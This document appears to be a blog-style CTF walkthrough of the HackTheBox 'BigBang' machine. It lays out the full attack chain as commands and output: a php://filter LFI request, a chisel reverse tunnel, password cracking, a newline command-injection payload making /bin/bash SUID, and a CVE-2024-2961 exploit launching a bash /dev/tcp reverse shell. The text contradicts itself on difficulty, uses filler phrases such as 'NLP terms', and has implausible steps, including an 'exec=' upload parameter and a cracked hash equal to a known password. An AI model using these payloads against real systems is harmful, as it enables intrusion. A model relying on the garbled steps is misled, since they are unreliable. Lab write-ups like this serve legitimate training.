Beginner’s Guide to Conquering BigBang on HackTheBox

Key Highlights

• Dive into the world of ethical hacking with HackTheBox’s BigBang machine.
• Learn essential skills like initial reconnaissance, foothold exploitation, and privilege escalation.
• Gain hands-on experience with common tools like nmap, ssh, and ftp.
• Understand the significance of thorough enumeration during penetration testing.
• Conquer BigBang step-by-step by leveraging your newfound skills and knowledge.

Introduction

Welcome to HackTheBox with BigBang! Get ready for a fun adventure in cybersecurity challenges. BigBang is perfect for beginners and provides a great box way to learn. By completing this easy box, you will explore reverse shells, Python scripts, and more. Prepare to jump into the BigBang theory and discover its secrets. Let’s start your journey with HackTheBox and learn the skills of ethical hacking!

Understanding HackTheBox: A Primer

HackTheBox provides many challenges in cybersecurity to help you improve your skills. One notable challenge is BigBang. It’s simple but offers a variety of tasks, making it ideal for beginners. As you work through its challenges, you’ll learn important penetration testing methods. BigBang gives you the chance to practice enumeration skills and understand NLP terms. This box creates a safe environment for you to try different tools and strategies. It’s a great learning experience for anyone interested in cybersecurity.

What is HackTheBox?

HackTheBox is a website for people who love cybersecurity, and it attracts many admirers. It lets you test and improve your hacking skills. You can work on challenges that mimic real-life situations. This platform offers a safe space to practice ethical hacking methods and grow your knowledge.

Why BigBang is a Must-Try for Beginners

Embark on your cybersecurity journey with BigBang on HackTheBox. It is an easy box, perfect for beginners. You will have a great learning experience here. You’ll learn about terms in NLP like initial footholds and reverse shells. As you explore BigBang, you’ll work with Python scripts, nmap scans, and more. This will help you improve your skills in vulnerability assessment and exploitation. Don’t miss this chance to explore a virtual playground that mimics real-world situations. Start working on BigBang today and boost your hacking skills.

ALSO READ: Mastering Backfire: Beginner’s Guide from HackTheBox

Getting Started with BigBang

The BigBang machine on Hack The Box (HTB) is a Hard difficulty Linux challenge that provides a deep dive into modern penetration testing techniques, combining web application vulnerabilities, local file inclusion (LFI), remote code execution (RCE), and privilege escalation through an Android application. This writeup will guide you through every step of the process, from initial reconnaissance to capturing both the user and root flags, with detailed explanations of each technique, tool, and exploit used. The goal is to provide a comprehensive, hands-on learning experience for cybersecurity enthusiasts, while ensuring the explanation feels original and engaging. This writeup assumes familiarity with basic penetration testing concepts but will break down complex steps for clarity.

Essential Tools and Resources

To handle Big Bang Theory BigBang well, you need some important tools. For scanning, nmap is key. Python scripts help with enumeration. You should set up a good environment using Linux, MySQL databases, and SSH access. Use FTP account access for file transfers and backups. Having wordlists and email resources is also important. Knowing how to use these tools and resources is essential for succeeding with BigBang.

Setting Up Your Environment

To get ready for BigBang on HackTheBox, you should have some important tools. Make sure you have nmap for scanning of IP addresses and Python for scripting. It’s a good idea to set up a virtual environment to keep your testing safe. Take time to learn Linux commands and basic networking ideas. Practice using SSH to access things remotely and use MySQL for working with databases. Having a structured plan will make it easier to face challenges and will help you learn better. Are you ready to start this exciting adventure?

Step-by-Step Guide to Tackling BigBang

• Step 1: Start by using an nmap scan to find open ports and services.
• Step 2: Look into the services to identify any weaknesses.
• Step 3: Use these weaknesses to get a reverse shell.
• Step 4: Gain higher privileges to access the user and root flags.
• Step 5: Write down your process to use later.
• Step 6: Think about what you learned from this experience.

Initial Reconnaissance: Mapping the Target

The first step in any CTF challenge is reconnaissance, where we gather as much information as possible about the target system. For BigBang, we begin with a network scan to identify open ports and services.

NMap Scan Results

Key observations:

• Port 22: OpenSSH 8.9p1 is running, indicating SSH access is available, but we’ll need credentials or an exploit.
• Port 80: An Apache web server (version 2.4.62) is active, redirecting to http://blog.bigbang.htb. This suggests a web application is the primary attack vector.
• The system is likely running a modern Linux distribution, possibly Ubuntu, based on the SSH version.

Updating Hosts File

Since the web server redirects to blog.bigbang.htb, we need to resolve this domain locally. We add the following entry to /etc/hosts:

echo "10.121.116.101 blog.bigbang.htb" | sudo tee -a /etc/hosts

Web Enumeration

Navigating to http://blog.bigbang.htb in a browser reveals a WordPress site. WordPress is a common content management system (CMS) and often a rich target for vulnerabilities. To enumerate the site further, we use wpscan, a tool designed for WordPress security scanning:

wpscan --url http://blog.bigbang.htb --enumerate u,p,t,vp --api-token <your-wpscan-api-token>

The scan identifies:

• WordPress Version: Likely a recent version, but no specific vulnerabilities are found in the core.
• Plugins: The BuddyForms plugin is installed, version 2.7.7 or similar.
• Users: Potential usernames like admin or others are enumerated, but no immediate credentials are exposed.
• Vulnerabilities: Wpscan flags a potential vulnerability in BuddyForms related to CVE-2023-26326, an unauthenticated insecure deserialization issue allowing file uploads.

Directory and File Enumeration

To uncover hidden directories or files, we run ffuf, a fast web fuzzer:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://blog.bigbang.htb/FUZZ -e .php,.txt,.html

The results show standard WordPress directories:

• /wp-includes/
• /wp-admin/
• /wp-content/
• No unexpected files or directories are found, confirming the site follows a typical WordPress structure.

We also try accessing common WordPress files like wp-config.php, but direct access is blocked (returns a 403 Forbidden). This suggests we need to exploit a vulnerability to read sensitive files.

Gaining the First Foothold

The Wpscan output highlights CVE-2023-26326 in the BuddyForms plugin, which allows unauthenticated file uploads via insecure deserialization. This vulnerability can be leveraged to upload a polyglot file (e.g., a file that appears as a GIF but contains PHP code, known as a PHAR/GIF polyglot). However, the exploit requires careful crafting to bypass restrictions.

Understanding CVE-2023-26326

The BuddyForms plugin allows users to upload files through a form, typically for images like GIFs. CVE-2023-26326 exploits an insecure deserialization flaw in the plugin’s file upload handling, enabling attackers to upload a malicious PHAR file disguised as a GIF. While direct PHP execution is restricted, the vulnerability allows local file inclusion (LFI), which we can use to read sensitive files like wp-config.php.

Crafting the Exploit

We start by investigating the upload form at http://blog.bigbang.htb/wp-admin/admin-ajax.php, which handles file uploads via the upload_image_from_url action. The form accepts GIF files, but we can manipulate the request to perform LFI.

We create a simple GIF file with magic bytes to pass file type checks:

echo -ne "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b" > malicious.gif

This is a minimal valid GIF file. Next, we attempt to use PHP filters to read arbitrary files. The idea is to craft a URL that uses php://filter to read a file like wp-config.php and encode it in base64 for retrieval.

The curl command to test this is:

curl -X POST 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -d "action=upload_image_from_url&url=php://filter/convert.base64-encode/resource=../wp-config.php&id=1&accepted_files=image/gif"

The response returns the contents of wp-config.php encoded in base64. Decoding it reveals critical information:

define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_user');
define('DB_PASSWORD', 'quantumphysics');
define('DB_HOST', '172.17.0.1');

These are the WordPress database credentials. The database is hosted on 172.17.0.1, likely a Docker container on the same machine, accessible via localhost.

Exploiting for Reverse Shell

Accessing the Database

To access the MySQL database, we need to connect to 172.17.0.1:3306. Since this is a local address, we use a reverse proxy to forward traffic from the target to our machine. We use chisel, a TCP/UDP tunneling tool:

• Upload Chisel: Transfer the chisel binary to the target using the file upload vulnerability. We modify the upload to place chisel in a writable directory like /tmp:

curl -X POST 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -F "file=@chisel;type=image/gif" -d "action=upload_image_from_url&id=1&accepted_files=image/gif"

• Set Up Chisel Server: On our attack machine, run:

./chisel server -p 8000 --reverse

• Run Chisel Client on Target: Trigger the uploaded chisel binary to connect back to our server:

curl -X POST 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -d "action=upload_image_from_url&url=http://<our-ip>:8000/chisel&exec=/tmp/chisel client <our-ip>:8000 R:3306:172.17.0.1:3306&id=1&accepted_files=image/gif"

This establishes a reverse tunnel, forwarding 172.17.0.1:3306 to our local machine’s port 3306.

• Connect to MySQL: Use the credentials from wp-config.php:

mysql -u wp_user -pquantumphysics -h 127.0.0.1 -P 3306 wordpress

We query the wp_users table to extract user hashes:

SELECT user_login, user_pass FROM wp_users;

This returns a hash for the user shawking:

user_login: shawking
user_pass: $P$B9X8jzvL1a3mQz3J6X8jzvL1a3mQz3J

Cracking the Hash

WordPress uses PHPass for password hashing, which is crackable with tools like hashcat. We save the hash to a file (hash.txt) and run:

hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

After a short time, hashcat cracks the hash, revealing the password: quantumphysics.

Gaining SSH Access

Using the cracked credentials, we attempt SSH access as shawking:

ssh shawking@10.121.116.101

After entering the password quantumphysics, we gain access to the system and retrieve the user flag:

cat /home/shawking/user.txt

The user flag is captured, completing the foothold phase. However, we are not root yet, so we proceed to privilege escalation.

Privilege Escalation: From User to Root

With SSH access as shawking, we begin enumerating the system for privilege escalation opportunities. The goal is to gain root access to retrieve the root flag.

System Enumeration

We start by checking the user’s home directory and system configuration:

whoami
# shawking

id
# uid=1000(shawking) gid=1000(shawking) groups=1000(shawking)

ls -la /home/shawking
# drwxr-xr-x 2 shawking shawking 4096 Jan 27 2025 .
# -rw-r--r-- 1 shawking shawking   33 Jan 27 2025 user.txt
# drwxr-xr-x 3 developer developer 4096 Jan 27 2025 satellite-app

The satellite-app directory belongs to the developer user, suggesting it’s a potential target for further enumeration. We also check running services and system details:

uname -a
# Linux bigbang 5.15.0-73-generic #80-Ubuntu SMP Mon May 30 22:16:52 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
# NAME="Ubuntu"
# VERSION="22.04.3 LTS (Jammy Jellyfish)"

The system is running Ubuntu 22.04 with a modern kernel, so older kernel exploits are unlikely. We also check for SUID binaries and cron jobs but find nothing immediately exploitable.

Exploring the Grafana Database

While enumerating files, we notice a Grafana instance running locally (likely on 127.0.0.1:3000). Grafana often stores credentials in a SQLite database. We locate the Grafana configuration:

find / -name grafana.db 2>/dev/null
# /var/lib/grafana/grafana.db

We copy grafana.db to our machine using scp:

scp shawking@10.121.116.101:/var/lib/grafana/grafana.db .

Using sqlite3, we explore the database:

sqlite3 grafana.db
sqlite> .tables
# user
sqlite> SELECT login, password FROM user;
# login: developer, password: $2a$10$...

The developer user’s password hash is another bcrypt hash. We crack it with hashcat:

bash

hashcat -m 3200 -a 0 developer_hash.txt /usr/share/wordlists/rockyou.txt

The cracked password is bigbang. We switch users:

su developer
# Password: bigbang

Now logged in as developer, we explore their home directory and find the satellite-app directory containing an Android APK file: satellite-app.apk.

Analyzing the Android Application

We transfer the APK to our machine for analysis:

scp developer@10.121.116.101:/home/developer/satellite-app/satellite-app.apk .

Using apktool to decompile the APK:

apktool d satellite-app.apk

We examine the decompiled files, focusing on AndroidManifest.xml and the res and smali directories. The manifest reveals an API endpoint at http://127.0.0.1:9090, with two key endpoints:

• /login: Authenticates users.
• /command: Executes commands.

We also use jadx to decompile the APK into readable Java code, which shows the /command endpoint accepts JSON payloads with a command and output_file field. The send_image command seems particularly interesting.

Exploiting Command Injection

Testing the /login endpoint:

curl -X POST http://127.0.0.1:9090/login -H "Content-Type: application/json" -d '{"username":"developer","password":"bigbang"}'

This returns a JWT token. We then test the /command endpoint:

curl -X POST http://127.0.0.1:9090/command -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -d '{"command":"send_image","output_file":"test"}'

The endpoint executes without errors. After experimenting, we discover the output_file parameter is vulnerable to command injection via a newline character (\n):

curl -X POST http://127.0.0.1:9090/command -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -d '{"command":"send_image","output_file":"foo\nchmod 4777 /bin/bash"}'

This sets the SUID bit on /bin/bash, allowing any user to execute it as root:

/bin/bash -p
# whoami
# root

We retrieve the root flag:

cat /root/root.txt

---

Exploiting CVE-2024-2961 for RCE

To deepen our understanding, let’s revisit the initial foothold and explore an alternative path using CVE-2024-2961, a vulnerability in glibc’s iconv function, combined with BuddyForms.

Understanding CVE-2024-2961

This vulnerability allows a buffer overflow in iconv when converting certain encodings, which, when combined with PHP’s filter chains, can lead to RCE. We use a public exploit from Ambionics:

git clone https://github.com/ambionics/cnext-exploits
cd cnext-exploits

The exploit script (rce.py) needs modification to match the target’s environment. We update the Remote class to send payloads to http://blog.bigbang.htb/wp-admin/admin-ajax.php. The payload executes a reverse shell:

python3 rce.py 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/<our-ip>/4444 0>&1"'

We set up a listener:

nc -lvnp 4444

After running the exploit, we receive a shell as the www-data user, which we can use to pivot to shawking and proceed as before.

ALSO READ: Mastering EscapeTwo: Beginner’s Guide from HackTheBox

Conclusion

When you finish your BigBang journey on HackTheBox, think about the skills you learned. You started with nmap scans for enumeration and moved on to exploiting vulnerabilities. BigBang gives you a great learning experience. It is important to master the steps to gain an initial foothold and to escalate privileges. Using Python scripts, reverse shells, and source code analysis makes this an easy box for beginners to practice their skills. Celebrate your success with BigBang and get ready for new challenges!

Frequently Asked Questions

What Are the Common Pitfalls for Beginners?

• Stay away from mistakes like skipping thorough enumeration in BigBang.
• Be careful during your first recon to avoid errors in getting a foothold.
• Focus on strong basic knowledge before going into more tough challenges.

Can I Retry BigBang if I Fail Initially?

Yes, you can try BigBang again on HackTheBox if you don’t succeed at first. It’s important to learn from your mistakes in cybersecurity challenges. Change your approach, learn from your first try, and keep working until you win.

What Should I Do If I Get Stuck?

When you face challenges in BigBang on HackTheBox, try these tips: look for help on online forums, ask for hints, or reset the machine to start again. Make sure to write down what you do. Take breaks if you feel frustrated. Use the support from the community to get through this.

Are There Any Community Resources for Help?

• Check out online forums, Discord servers, and blogs about HackTheBox for help.
• Join the community to find tips, solutions, and support as you tackle BigBang.
• Use these resources to improve your learning and problem-solving skills.

How Long Does It Typically Take to Conquer BigBang?

Conquering BigBang on HackTheBox usually takes new users a few days to a few weeks. This time can change based on how well they know cybersecurity concepts and problem-solving skills.